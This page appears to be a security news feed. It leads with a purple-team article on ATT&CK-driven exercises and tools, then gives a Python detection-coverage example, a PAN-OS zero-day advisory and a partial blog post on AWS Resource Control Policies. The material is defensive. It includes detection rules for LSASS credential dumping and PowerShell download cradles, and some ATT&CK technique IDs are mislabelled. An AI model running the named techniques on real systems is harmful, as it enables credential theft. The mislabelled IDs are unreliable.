Uncover Detection Gaps: For example, if a red team executes a lateral movement technique (e.g., Pass-the-Ticket, T1550.003), and the blue team fails to detect it, the gap is identified. A purple team collaborates to create detection rules, such as monitoring Kerberos ticket-granting service usage via SIEM.
Test Security Controls: Test IDS/IPS, EDR, and firewalls against known TTPs. If PowerShell Downgrade Attacks (T1059.001) evade detection, the purple team can work to enhance detection by enabling PowerShell transcription logging and adding custom detection rules.
Ensure Continuous Improvement: Post-tests, ensure defenses like automated response playbooks (e.g., isolating compromised hosts) are updated to counter TTPs used in simulations.

Teams & Tools Involved in Purple Teaming

Red Team: Uses tools like Metasploit, Cobalt Strike, or Caldera to simulate attack vectors. Examples: Exploiting remote services (T1021) or launching malware execution (T1204).
Blue Team: Monitors SIEM logs (Elastic Stack, Splunk) for anomalies. Examples: Custom Sigma rules for detecting unusual logon patterns (T1078) or privileged access abuse (T1110).
Threat Intelligence Team: Provides details about adversary groups like FIN7 or APT29. Guides TTP selection by mapping real-world incidents to MITRE tactics.
DevOps Team: Implements technical changes, such as updating configurations or deploying additional logging (e.g., enabling Sysmon for Windows event logging).

Use of the MITRE ATT&CK Framework

The MITRE ATT&CK framework aids in systematically mapping attack scenarios.
Adversary Mapping: Select a threat group, such as FIN7. Use MITRE ATT&CK Navigator to focus on their common techniques, e.g., Credential Dumping (T1003) or Phishing (T1566).
Gap Analysis: Use MITRE Navigator to highlight covered and uncovered TTPs. Example: If Command and Control (T1071) techniques are uncovered, prioritize these in red team simulations.
Visualization: MITRE Navigator lets you create heatmaps of detection gaps. Example layer file (techniques are listed under the "techniques" key, which is what Navigator reads):

    {
      "name": "Detection Coverage",
      "techniques": [
        {
          "techniqueID": "T1059",
          "color": "#ff0000",
          "comment": "Requires logging improvements."
        }
      ]
    }

Approaches to Decide Which TTPs to Use in Purple Teaming

Vulnerability Management Data: Map unresolved vulnerabilities (e.g., missing patches) to MITRE TTPs. Example: If Privilege Escalation (T1068) is a common weakness, simulate this using tools like Caldera.
[Figure: Sample Qualysguard data used to map open vulnerabilities in your own infrastructure to MITRE TTPs]

Hunt Model Gaps: Hunt models define how an organization searches for specific threats across different MITRE ATT&CK phases. Gaps occur when certain TTPs or phases have:
Limited or no detection coverage.
Weak hunting hypotheses or playbooks.
Inadequate telemetry or visibility into attack activity.
These gaps represent blind spots that adversaries could exploit, making them high-priority areas for Purple Team activities.

Why Focus on Hunt Model Gaps?
Addressing Real-World Threats: Gaps in hunt models indicate areas where an organization’s defenses are weakest. By focusing on these gaps, Purple Teams ensure that resources are directed toward fixing the most pressing vulnerabilities. For example: if the hunt model lacks detection for Initial Access techniques (e.g., spear phishing or malicious macros), the Purple Team can focus on simulating these TTPs and refining Blue Team responses.
Efficient Use of Resources: Security teams often have limited time and personnel. Prioritizing TTPs based on hunt model gaps avoids wasting resources on well-covered phases, ensuring that efforts are spent where they are needed most.
Improving Detection and Hunting Maturity: Running Purple Team activities on uncovered TTPs strengthens both proactive hunting (hypotheses and playbooks) and reactive detection (SIEM rules, alerts). This helps SOCs evolve their maturity and preparedness.
Validating and Closing Gaps: By simulating TTPs that correspond to hunt model gaps, organizations can validate their ability to detect and respond to those techniques, ensuring that defensive improvements are measurable and effective.

Example Use Case:
Scenario: A hunt model gap is identified in the Execution phase, specifically around PowerShell-based attacks.
Steps Taken:
Red Team Activity: Simulate common PowerShell attack techniques like Invoke-Mimikatz or Download Cradle.
Blue Team Effort: Detect anomalies such as suspicious PowerShell commands or unusual process chains.
Outcome:
Enhanced hunt playbooks for PowerShell abuse.
Improved detection rules in EDR and SIEM.
Mitigation of the gap in the hunt model.

Recent Industry Breaches: To select the most relevant TTPs for a Purple Team activity, analyzing recent breaches provides a real-world perspective on the techniques adversaries are currently using. This approach ensures that the organization’s defenses are tested against threats it is most likely to face.

Why Analyze Recent Breaches?
Relevance to Industry Trends: Breaches in a specific industry often reveal patterns in attack techniques targeting similar organizations. For example, attackers targeting the financial sector may use credential stuffing (T1110.004) due to the prevalence of login portals.
Learning from Peer Incidents: Examining breaches in other organizations allows you to anticipate potential attack vectors, even if they haven’t been exploited in your environment yet.
Contextual TTP Selection: The TTPs observed in recent breaches help align Purple Team simulations with the most probable attack scenarios, making the exercise more impactful.

Example: Retail Sector — Magecart and Web Skimming
Scenario: Retailers are frequently targeted by Magecart groups that execute web skimming attacks (T1185). These attacks involve injecting malicious JavaScript into online checkout pages to steal credit card details.
Steps for Purple Team Activity:
(1) Breach Analysis: Recent Magecart incidents revealed attackers:
Gained initial access through weak admin credentials or misconfigured cloud storage (T1078).
Injected malicious code into checkout pages to exfiltrate data (T1185).
Used customized obfuscation techniques to evade detection (T1027).
(2) Purple Team Activity:
Red Team: Simulates web skimming by injecting JavaScript into a test environment’s checkout page. Includes techniques like:
Exfiltrating fake credit card data to a remote server.
Using obfuscated scripts to mimic real-world tactics.
Blue Team: Tests their ability to:
Detect unusual web requests and script changes.
Respond by isolating affected systems and removing malicious code.
(3) Outcome:
New detections implemented (e.g., monitoring JavaScript changes).
Hunt model updated to include hypotheses for web injection anomalies.
Improved incident response for similar attacks.

Observed Attack Trends on Own Infrastructure: Analyzing recent attack trends targeting your organization’s infrastructure is one of the most effective ways to determine which TTPs should be prioritized in Purple Team exercises. These trends provide insights into current threats, adversary behaviors, and weaknesses in your environment that need immediate attention.

Why Focus on Observed Attack Trends?
Contextual Relevance: Attack trends specific to your organization highlight the techniques adversaries are actually using against your systems, making them highly relevant to your defense strategy.
Proactive Mitigation: Simulating these observed trends allows your teams to preemptively improve detection, response, and recovery capabilities before an attack succeeds.
Data-Driven Prioritization: Leveraging historical data ensures that TTP selection is evidence-based rather than hypothetical or generic, maximizing the value of the Purple Team activity.

How to Identify Observed Attack Trends
1. Analyze Incident Data: Review logs from SIEMs, EDR tools, and other monitoring systems to extract patterns in recent attacks. For example:
Frequency: What attack types or TTPs have been most common?
Success Rates: Which attacks bypassed detection or succeeded partially?
Phases of Attack: Which MITRE ATT&CK phases have been most targeted?
2. Engage Threat Intelligence Feeds: Correlate your internal observations with external threat intelligence to validate whether trends align with known adversary campaigns.
3. Review Incident Response Reports: Examine post-incident reviews to identify TTPs that exploited gaps in defenses or overwhelmed detection systems.
4. Collaborate Across Teams: Include insights from Red Teams (pen tests or adversary simulations), Blue Teams (monitoring and response), and even SOC analysts to capture a complete picture of recent trends.

Tools for Purple Teaming

(a) Caldera: Caldera is particularly suited for Purple Teaming because it allows Red and Blue Teams to simulate advanced adversary techniques and test defensive measures in a controlled environment.
1. TTP Simulation (Red Team): Red Teams can simulate attacks based on specific adversary behaviors. Caldera allows the automation of entire attack chains, from initial access to data exfiltration, by selecting relevant TTPs from the MITRE ATT&CK framework.
2. Adversary Profiles: Caldera supports predefined adversary profiles, which represent the tactics, techniques, and procedures used by specific threat groups (e.g., APTs). These profiles map directly to MITRE ATT&CK. Example profiles:
APT28: Simulate Russian cyber espionage tactics (e.g., Spearphishing (T1566), Exfiltration (T1041)).
APT34: Simulate oil and energy sector attacks (e.g., Exploitation for Privilege Escalation (T1068)).
3. Customizable Attacks: You can also customize attack profiles based on your organization’s needs. Caldera allows the creation of attack chains (series of techniques) or standalone techniques, which can be tailored to simulate specific adversary campaigns.
4. Collaborative Simulations:
Red Team: Executes adversary emulation scenarios defined within Caldera.
Blue Team: Observes the attack and reacts using their existing detection and incident response processes.
Both teams can interact in real time, allowing Blue Teams to test and refine their detection and mitigation processes.

Example Use Case: Simulating a Lateral Movement Attack
Objective: Simulate a Lateral Movement attack (e.g., T1021 — Remote Services) to test the Blue Team’s detection and response.
Create or Choose an Adversary Profile: Choose an adversary profile such as APT28 (which often uses Remote Services (T1021) for lateral movement).
Define the Attack Scenario: Define the specific techniques within MITRE ATT&CK relevant to lateral movement. For example, Remote Desktop Protocol (T1076), Windows Admin Shares (T1021.002), or SMB/Net Session Hijacking (T1021.001).
Automate the Simulation: Use Caldera to automate the lateral movement attack across multiple hosts in your network. Red Team: Executes the attack by moving laterally between systems and trying to escalate privileges.
Observe the Blue Team’s Response: Blue Team: Monitors network traffic, identifies lateral movement, and attempts to stop the attack using endpoint protection tools, firewalls, and other network defense measures. Evaluate how quickly the Blue Team detects the attack and what defensive actions they take.
Feedback Loop: After completing the attack scenario, the Purple Team (Red + Blue) debriefs to assess the Blue Team’s detection efficacy and response strategies. Based on the gaps identified, Blue Team defenses are enhanced.

(b) MITRE ATT&CK Navigator: Visual tool for mapping detection coverage. Example: Use heatmaps to prioritize high-risk TTPs, such as Execution (T1059).

(c) Sigma Rules & Elastic Stack: Sigma Rules translate TTPs into detection queries. Example Sigma rule for detecting Mimikatz-style LSASS access (Sysmon Event ID 10 is a ProcessAccess event, so the logsource is the process_access category rather than the Windows Security log; the condition line is required by the Sigma format):

    title: Suspicious LSASS Memory Dump
    logsource:
      product: windows
      category: process_access
    detection:
      selection:
        EventID: 10
        TargetImage|contains: 'lsass.exe'
      condition: selection
    level: critical

Deploy in Elastic Stack for real-time monitoring.

Additional Free Tools for Purple Teaming

1. Atomic Red Team
Overview: Atomic Red Team is an open-source tool designed to test specific MITRE ATT&CK techniques by providing small, atomic (individual) tests. These tests focus on simulating the behavior of adversaries as they execute real-world tactics, techniques, and procedures (TTPs). The tool is designed to allow Red Teams and Blue Teams to validate detection and response capabilities in a controlled environment.
How it Works:
Test Execution: Atomic Red Team provides a library of predefined tests mapped to specific MITRE ATT&CK techniques. Each test is a standalone action that simulates a specific attack technique, such as running a PowerShell script to execute Command and Scripting Interpreter (T1059).
Example: To simulate T1059 (Execution via PowerShell), Atomic Red Team could execute a PowerShell script that triggers a command-line execution, which mimics the behavior of an attacker attempting to execute malicious code remotely.
Use Case: This tool is useful for Blue Teams to validate their detection rules or SIEM configurations by observing how specific attack techniques appear in their environment. It allows quick testing of defensive tools (like SIEM or EDR) without the complexity of full attack simulations.

2. Prelude Operator
Overview: Prelude Operator is a free, open-source adversary emulation platform that helps organizations operationalize the MITRE ATT&CK framework. It allows you to execute complex, multi-step attack scenarios designed to emulate advanced persistent threats (APTs) and test your security posture.
How it Works:
Multi-Step Scenarios: Unlike single techniques in Atomic Red Team, Prelude Operator enables you to execute more complex attack chains. For example, you can simulate a complete phishing campaign that includes Initial Access (T1071), Credential Dumping (T1003), and Lateral Movement (T1021) in one scenario.
GUI Interface: The platform provides a graphical user interface (GUI), making it easier to set up, configure, and run adversary emulation scenarios. This is especially helpful for Blue Teams that need to observe the entire attack lifecycle and improve detection capabilities across multiple phases of an attack.
Use Case: Prelude Operator allows for repeatable, customizable adversary emulation tests, where you can tailor attack simulations to your organization’s specific needs, targeting multiple phases of an adversary’s attack lifecycle.

3. DetectionLab
Overview: DetectionLab is a virtualized environment designed to test and enhance detection capabilities in a safe, isolated setup. It comes preconfigured with a variety of Security Information and Event Management (SIEM) tools and Endpoint Detection and Response (EDR) solutions, allowing teams to simulate attacks and assess the performance of their detection systems.
How it Works:
Preconfigured Setup: DetectionLab provides a complete, ready-to-use virtual environment. It includes a SIEM system (like Elastic Stack or Splunk) and an EDR tool (like OSQuery or Carbon Black), which makes it easy for Blue Teams to simulate attacks and observe how their detection tools respond.
Environment Simulation: You can deploy and execute a variety of attack scenarios within the environment, including those mapped to MITRE ATT&CK. This helps teams validate whether their SIEM or EDR tools can detect attacks like Privilege Escalation (T1068) or Exfiltration (T1041).
Use Case: DetectionLab is ideal for Blue Teams looking to enhance their ability to detect advanced persistent threats and validate their detection systems in a low-risk, isolated setup. It helps with the hands-on testing of detection rules and tuning them based on real-world attack simulations.

Summary of Benefits
Atomic Red Team: Provides quick, focused tests of individual MITRE ATT&CK techniques, helping teams validate specific detection rules.
Prelude Operator: Facilitates operational adversary emulation with multi-step attack scenarios, ideal for testing end-to-end security measures and improving detection across the full attack lifecycle.
DetectionLab: Offers a preconfigured, isolated environment for testing and enhancing detection capabilities, providing a risk-free space for Blue Teams to fine-tune SIEM and EDR tools.
These tools, when used together, enable both Red and Blue Teams to simulate, detect, and improve defenses against real-world threats in a collaborative and structured manner.

Challenges and Recommendations
Challenge: Ensuring Alignment Between Teams. Solution: Use collaboration platforms like Slack or MS Teams for real-time updates. Schedule regular meetings to discuss findings and plans.
Challenge: Resource Constraints. Solution: Leverage open-source tools like Caldera and Atomic Red Team to reduce costs.
Challenge: Measuring Effectiveness. Solution: Track KPIs, such as:
Time to detect simulated attacks.
Number of TTPs successfully mitigated.

Conclusion
Purple team activities are indispensable for building robust cyber defenses. By leveraging tools like Attackgen, Caldera, MITRE Navigator, and Sigma Rules, organizations can bridge gaps between detection and response capabilities. A systematic approach to TTP selection ensures relevance and effectiveness, while free tools and structured frameworks lower barriers to entry.

Purple Team Activities: Where Offense Meets Defense to Strengthen Cyber Resilience was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
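The article's Sigma rule and its Navigator heatmap are two halves of one feedback loop, so here is an added Python example (written for this page, not code from the article or from Sigma, Caldera or MITRE) that evaluates Sigma-style selections against a handful of constructed Sysmon-like events and then emits an ATT&CK Navigator layer that colours each planned technique by whether a rule exists and whether it fired. The events, the rule set, the planned technique list and the colour scheme are all constructed for illustration; it also generalises the article's single rule to the "selection and not filter" condition shape.

```python
import json

# Constructed Sysmon-like events (not real telemetry): ProcessAccess (Event ID 10)
# and ProcessCreate (Event ID 1) records reduced to the fields the rules need.
SYSMON_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Users\alice\AppData\Local\Temp\procdump64.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Process"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe", "GrantedAccess": "0x1400"},
]

# Sigma-style rules expressed as Python data. Keys use Sigma's "field|modifier"
# syntax; a list of values means "any of". Technique IDs are assumed mappings.
RULES = [
    {
        "title": "Suspicious LSASS Memory Dump",   # the article's rule plus a filter
        "technique": "T1003.001",                  # OS Credential Dumping: LSASS Memory
        "selection": {"EventID": 10, "TargetImage|endswith": "\\lsass.exe"},
        # System processes that legitimately open LSASS; tune for your own estate.
        "filter": {"SourceImage|endswith": ["\\svchost.exe", "\\csrss.exe", "\\wininit.exe"]},
        "condition": "selection and not filter",
    },
    {
        "title": "PowerShell Download Cradle",
        "technique": "T1059.001",                  # Command and Scripting Interpreter: PowerShell
        "selection": {"EventID": 1, "Image|endswith": "\\powershell.exe",
                      "CommandLine|contains": "DownloadString"},
        "condition": "selection",
    },
]

# Techniques the exercise plans to simulate; T1021.002 deliberately has no rule.
PLANNED_TECHNIQUES = ["T1003.001", "T1059.001", "T1021.002"]


def _value_matches(value, expected, modifier):
    """Apply one Sigma modifier (contains/startswith/endswith) or an exact match."""
    if value is None:
        return False
    value, expected = str(value).lower(), str(expected).lower()
    if modifier == "contains":
        return expected in value
    if modifier == "startswith":
        return value.startswith(expected)
    if modifier == "endswith":
        return value.endswith(expected)
    return value == expected


def _block_matches(event, block):
    """A selection/filter block matches when every field condition holds (AND)."""
    for key, expected in block.items():
        field, _, modifier = key.partition("|")
        candidates = expected if isinstance(expected, list) else [expected]
        if not any(_value_matches(event.get(field), c, modifier) for c in candidates):
            return False
    return True


def rule_fires(rule, event):
    """Evaluate the two condition shapes used here: 'selection' and
    'selection and not filter'."""
    if not _block_matches(event, rule["selection"]):
        return False
    if rule["condition"] == "selection and not filter":
        return not _block_matches(event, rule["filter"])
    return True


def run_rules(rules, events):
    """Return {rule title: [indices of events that fired the rule]}."""
    return {r["title"]: [i for i, e in enumerate(events) if rule_fires(r, e)]
            for r in rules}


def coverage_layer(rules, events, planned, name="Detection Coverage"):
    """Build an ATT&CK Navigator layer: red = no rule, yellow = rule never fired,
    green = rule fired during the simulation."""
    hits = run_rules(rules, events)
    techniques = []
    for tid in planned:
        rules_for = [r for r in rules if r["technique"] == tid]
        if not rules_for:
            color, comment = "#ff0000", "No detection rule; requires logging improvements."
        elif any(hits[r["title"]] for r in rules_for):
            color, comment = "#00ff00", "Detected during purple team simulation."
        else:
            color, comment = "#ffcc00", "Rule exists but did not fire; review telemetry."
        techniques.append({"techniqueID": tid, "color": color, "comment": comment})
    # "versions" should also carry the attack/navigator versions of your deployment.
    return {"name": name, "domain": "enterprise-attack",
            "versions": {"layer": "4.5"}, "techniques": techniques}


if __name__ == "__main__":
    print(json.dumps(coverage_layer(RULES, SYSMON_EVENTS, PLANNED_TECHNIQUES), indent=2))
```

Running the script prints a layer file that can be imported into ATT&CK Navigator; in the constructed data only the procdump event fires the LSASS rule, the PowerShell rule never fires, and T1021.002 is flagged as having no rule at all.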
by InfoSec Write-ups
2024-11-18 14:39:28
IDOR Leading To Improper Access ControlContinue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-11-18 14:29:29
Discontinued GeoVision Products Targeted in Botnet Attacks via Zero-DayA zero-day vulnerability affecting five discontinued GeoVision product models has been exploited by a botnet. The post Discontinued GeoVision Products Targeted in Botnet Attacks via Zero-Day appeared first on SecurityWeek.
by SecurityWeek
2024-11-18 14:22:02
CVE-2024-0012, CVE-2024-9474: Zero-Day Vulnerabilities in Palo Alto PAN-OS Exploited In The Wild

Palo Alto Networks confirmed two zero-day vulnerabilities were exploited as part of attacks in the wild against PAN-OS devices, with one being attributed to Operation Lunar Peek.

Background

On November 18, Palo Alto Networks updated its advisory (PAN-SA-2024-0015) for a critical flaw in its PAN-OS software to include a CVE identifier:

CVE            | Description                                 | CVSS
CVE-2024-0012  | PAN-OS Authentication Bypass Vulnerability  | 9.3

In addition to CVE-2024-0012, Palo Alto Networks assigned a second CVE for a privilege escalation vulnerability (CVE-2024-9474).

CVE            | Description                                 | CVSS
CVE-2024-9474  | PAN-OS Privilege Escalation Vulnerability   | 6.9

Analysis

CVE-2024-0012 is an authentication bypass vulnerability in the management web interface of PAN-OS devices. An unauthenticated, remote attacker could exploit this vulnerability to obtain administrator privileges on the vulnerable PAN-OS device, enabling follow-on activity including modifying device configuration, accessing other administrative functions, as well as exploiting other vulnerabilities, such as CVE-2024-9474.

CVE-2024-9474 is a privilege escalation vulnerability in the web management interface of PAN-OS devices. An authenticated, remote attacker could exploit this vulnerability to gain root privileges on the firewall.

While not explicitly referenced in its advisory, based on the description, it is believed that CVE-2024-0012 and CVE-2024-9474 may have been used as part of an exploit chain.

Attributed to Operation Lunar Peek

In a threat brief about the vulnerabilities, Palo Alto Networks’ Unit 42 has attributed the exploitation of CVE-2024-0012 to a campaign they call Operation Lunar Peek. As of November 18, no specific details have been shared about Operation Lunar Peek or attribution to a specific threat actor or country of origin.

While Unit 42 did not explicitly connect CVE-2024-9474 to this operation, they reference this flaw as part of follow-on activity and have stated they’ve “observed threat activity that exploits this vulnerability against a limited number of management web interfaces.”

Initial advisory published on November 8

PAN-SA-2024-0015 was first published on November 8, following reports of a zero-day vulnerability affecting the management interfaces of PAN-OS devices. Reports indicate that someone was selling access to a zero-day in PAN-OS. It wasn’t until November 14 that Palo Alto Networks confirmed “threat activity” associated with this zero-day.

Proof of concept

At the time this blog post was published, there was no proof-of-concept (PoC) available for this vulnerability.

Solution

The following table contains a list of affected and fixed versions of PAN-OS:

Product        | CVE-2024-0012         | CVE-2024-9474         | Fixed Version
PAN-OS 10.1    | Not Affected          | 10.1.14-h4 and below  | 10.1.14-h6 and above
PAN-OS 10.2    | 10.2.12-h1 and below  | 10.2.12-h1 and below  | 10.2.12-h2 and above
PAN-OS 11.0    | 11.0.5-h2 and below   | 11.0.5-h2 and below   | 11.0.6-h1 and above
PAN-OS 11.1    | 11.1.4-h7 and below   | 11.1.4-h7 and below   | 11.1.5-h1 and above
PAN-OS 11.2    | 11.2.3-h3 and below   | 11.2.3-h3 and below   | 11.2.4-h1 and above
Cloud NGFW     | Not Affected          | Not Affected          | -
Prisma Access  | Not Affected          | Not Affected          | -

Equally as important as applying patches, organizations that utilize PAN-OS devices should secure the management web interface to prevent external access, opting instead to limit access to trusted internal IP addresses. For more information, please refer to Palo Alto’s guide, Tips & Tricks: How to Secure the Management Access of Your Palo Alto Networks Device.

Identifying affected systems

A list of Tenable plugins for this vulnerability can be found on the individual CVE pages for CVE-2024-0012 and CVE-2024-9474 as they’re released. These links will display all available plugins for these vulnerabilities, including upcoming plugins in our Plugins Pipeline.

Get more information
Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
PAN-SA-2024-0015: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface
CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface

Join Tenable's Security Response Team on the Tenable Community.
Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.
by Tenable
2024-11-18 14:10:32
Chinese Salt Typhoon Hacked T-Mobile in US Telecom Breach Spree
Another day, another hack at T-Mobile! This time, Chinese state-sponsored group Salt Typhoon hacked T-Mobile, targeting US telecoms…
by Hackread
2024-11-18 13:54:34
Critical RCE bug in VMware vCenter Server now exploited in attacks
Broadcom warned today that attackers are now exploiting two VMware vCenter Server vulnerabilities, one of which is a critical remote code execution flaw. [...]
by BleepingComputer
2024-11-18 13:50:34
Space tech giant Maxar confirms hacker accessed employees’ personal data
Maxar has 2,600 employees — with more than half having security clearances to work on classified U.S. government projects.
by TechCrunch
2024-11-18 13:44:34
Ransomware Attack on Oklahoma Medical Center Impacts 133,000
Great Plains Regional Medical Center says the personal information of 133,000 individuals was compromised in a ransomware attack.
by SecurityWeek
2024-11-18 13:38:03
DHS Releases Secure AI Framework for Critical Infrastructure
The voluntary recommendations from the Department of Homeland Security cover how artificial intelligence should be used in the power grid, water system, air travel network, healthcare, and other pieces of critical infrastructure.
by Dark Reading
2024-11-18 13:28:45
300 Drinking Water Systems in US Exposed to Disruptive, Damaging Hacker Attacks
EPA flags security vulnerabilities in more than 300 drinking water systems that serve roughly 110 million individuals.
by SecurityWeek
2024-11-18 13:13:51
Palo Alto Networks Releases IoCs for New Firewall Zero-Day
Palo Alto Networks has released IoCs for the attacks exploiting a newly uncovered firewall zero-day vulnerability.
by SecurityWeek
2024-11-18 13:00:16
The best password manager for Mac in 2024: Expert tested
We tested the best password managers for Mac right now, to help you keep your laptop logins secure. These are our favorites.
by ZDNET Security
2024-11-18 13:00:00
New AWS Control Policy on the Block
AWS has released an important new feature that allows you to apply permission boundaries around resources at scale called Resource Control Policies (RCPs). Read on to learn what RCPs are all about and how to use them, as well as how Tenable Cloud Security already factors them into its analysis.

AWS just launched Resource Control Policies (RCPs), a new feature in AWS Organizations that lets you restrict the permissions granted to resources. If you are familiar with service control policies (SCPs), you may have an idea of what an RCP can do and what it’s good for. We thought “unboxing” RCPs would be beneficial both for those of you seasoned in using guardrails and for novices. So after taking this shiny new feature out for a spin, here’s what we have to say about it.

What are RCPs?

Before we can explain RCPs, we need to cover the concept of guardrails and “data perimeters.” Where AWS really shines in its IAM features is in the multiple mechanisms it provides for managing entitlements to resources in AWS accounts. As practitioners who have been pioneers in helping organizations achieve least privilege and manage access in the most effective way possible, we at Tenable Cloud Security have a lot of appreciation for these features.

Access guardrails are a significant component of the arsenal of tools AWS provides its customers to properly control access to resources. They are robust and highly configurable controls that can be placed on accounts, resources and/or identities to limit the potential sum of permissions they can be assigned. Access guardrails act as a boundary, so even when someone tries to assign unauthorized permissions to an entity, whether the attempt is accidental or malicious, the access won’t be granted. A guardrail could be, for example, a “permission boundary” placed on a specific principal, such as an IAM role or IAM user, to limit the potential permissions the principal can have. Or it can be a resource-based policy applied to a specific resource to limit the principals that can access the resource, the access conditions, the actions that can be performed, and so on. If you wanted to impose such a boundary at scale on all identities in an account, or even in several accounts, you could do it using an SCP applied from AWS Organizations. SCPs are known as very effective boundaries, although they don’t solve the issue of resource-based policies that grant access to principals from external accounts (more on that later). This kind of boundary may also be known as a “data perimeter.” Several such boundary types exist. We’re going to touch on just a few, so if you’re interested in more details, we recommend reading this article by AWS which reviews the different ways to create these data perimeters.

Simply put, the newly introduced RCPs are a boundary applied to all resources (of the supported resource types) in an account or accounts. Just as you can use an SCP to apply a boundary at scale to all principals in an account, instead of to each principal separately using a permission boundary, you can use an RCP to apply a boundary to all resources of an account, instead of to each resource separately using its resource-based policy.

From AWS Organizations, you can create and apply RCPs similarly to how you would an SCP; you can find RCPs under “Policies” in AWS Organizations.

[Screenshot: Location of RCPs under “Policies” in AWS Organizations]

The management interface of RCPs has the same “look and feel” as that of SCPs.

[Screenshot: Console management of RCPs, exactly the same as for SCPs]

If you listen closely you may be able to hear slide decks about AWS IAM changing around the world, as the widely known policy evaluation logic diagram for AWS access has now been changed to include the RCP.

[Figure: The new AWS policy evaluation logic diagram, now including RCPs (Source: AWS Documentation)]

Why are RCPs important?

As mentioned earlier, SCPs have a well-known limitation: while very effective as a boundary, SCPs ironically don’t solve the issue of resource-based policies that grant access to principals from external accounts. That is, if the resource-based policy applied to a resource grants direct access to a principal from a different account, the SCP will not limit that access. This isn’t intuitive, so many people may not realize it. Granted, the best practice is to provide such access through an IAM role to be assumed by the principal in the external account, with that IAM role in turn granted the permissions required by that principal. However, best practices are often not implemented. Access granted by a resource-based policy is an issue security professionals can’t ignore.

So, RCPs allow you to apply such a boundary at scale, which is great. Until now, doing so was not an option. An added bonus: having a separate instrument for applying this boundary to resources may improve practitioner awareness that SCPs are a boundary for identities in the account and do not limit external access; that’s the job of the resource-oriented control, the RCP. But it’s important to also remember that these boundaries are not just around permissions. You can also use RCPs to enforce conditions on access to resources, which we will detail in the next section.

One last thing: when exploring RCPs, don’t stop using SCPs. They’re highly effective as a boundary and serve their intended purpose: applying a boundary for what identities in the account can perform in the account and outside of it, meaning on other accounts as well. An RCP doesn’t do this. In short, SCPs and RCPs have different use cases, so keep that in mind.

Usage

So how do we use this boundary goodness? Let’s look at a few examples, and at several important points about RCPs.

Creating a data perimeter for a resource

As mentioned, when it comes to scale, RCPs take the creation of a “perimeter” around resources to the next level. The good news is that all global condition keys, as well as the condition keys of the services that RCPs support, are available in RCPs. This is pretty cool as it allows you to really hit the ground running with RCPs. For example, if we use attribute-based access control (ABAC) to manage access to a resource, we can deny principals tagged Department=Dev all access to sensitive S3 buckets identified by a name pattern, using an RCP that looks like this:

    {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Effect": "Deny",
          "Principal": "*",
          "Action": "s3:*",
          "Resource": "arn:aws:s3:::testing-rcp-pattern-sensitive-bucket-*",
          "Condition": {
            "StringEquals": {
              "aws:PrincipalTag/Department": "Dev"
            }
          }
        }
      ]
    }

Unfortunately, “NotAction” is not supported. It would have been great to be able to deny every action except a few specific exempt ones. Hopefully, it will be supported some day.

In addition to setting the boundary for principals, you can also enforce that access has to come from specific VPCs or IPs, as such:

    {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Sid": "Statement1",
          "Effect": "Deny",
          "Principal": "*",
          "Action": "s3:*",
          "Resource": "*",
          "Condition": {
            "NotIpAddress": {
              "aws:SourceIp": "<IP_ADDRESS>"
            }
          }
        }
      ]
    }

Enforce action-related policy

In addition to enforcing that access is done, or not done, by certain principals or from certain locations, you can also use RCPs to enforce how the access will be granted. The RCP functions as a kind of policy as code. For example, you can enforce that access to S3 buckets will only be done over TLS, as such:

    {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Effect": "Deny",
          "Principal": "*",
          "Action": "s3:*",
          "Resource": "*",
          "Condition": {
            "Bool": {
              "aws:SecureTransport": "false"
            }
          }
        }
      ]
    }

Or, you can enforce default server-side encryption (SSE) on objects uploaded to S3 buckets, like this:

    {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Effect": "Deny",
          "Principal": "*",
          "Action": "s3:PutObject",
          "Resource": "*",
          "Condition": {
            "StringNotEquals": {
              "s3:x-amz-server-side-encryption": "AES256"
            }
          }
        }
      ]
    }

Pretty cool, isn’t it?

Don't cause denial-of-service

Be mindful to avoid creating your own denial of service (DoS) on your infrastructure by denying legitimate access by mission-critical services, employees or customers. When controls are used incorrectly, this can happen. Here’s an obvious tip: always test in lower environments (development, testing, staging) every control you’ll apply to production. That said, keep these things in mind to ease the safe adoption of RCPs:

- The “NotResource” element is supported. You can use it to exclude resources to which the RCPs won’t apply.
- The “NotPrincipal” element is not supported. You must specify “*” as the “Principal.” This isn’t problematic because you can apply the appropriate logic around principals by using condition keys such as “aws:PrincipalArn” and “aws:PrincipalAccount”.
- Third-party services that perform various business functions such as security (like Tenable Cloud Security), DevOps and FinOps on your cloud environment might be blocked by RCPs. You may have to exclude them from those RCPs if you want them to operate properly.
- Finally, since AWS service principals may also be restricted by RCPs, you should use appropriate condition keys (such as aws:PrincipalIsAWSService and aws:PrincipalServiceName) to exclude the relevant ones, as you would in a resource-based policy. (We’ve written about this issue in another blog post.)

Services supported

It’s key to keep in mind that RCPs only support a handful of services:

- Amazon S3
- AWS Security Token Service (STS)
- Amazon SQS
- AWS KMS
- AWS Secrets Manager

This is a good start, of course, because SQS, S3 and Secrets Manager usually host sensitive and mission-critical resources, while STS is crucial for creating a boundary around assuming IAM roles. As mentioned, limiting IAM role assumption is important for preventing external identities from gaining access to resources within an account. And of course, KMS is a sensitive service. Protecting KMS keys with a boundary, for example on setting the key policy, is an amazing use case for RCPs.

Quotas

Similarly to SCPs, there’s a quota of five RCPs per Organizational Unit (OU). You can apply five of each. Also, similarly to SCPs, there’s a 5,120 character limit per policy, and you can create and store up to 1,000 RCPs in an organization.

Factoring it into your cloud security

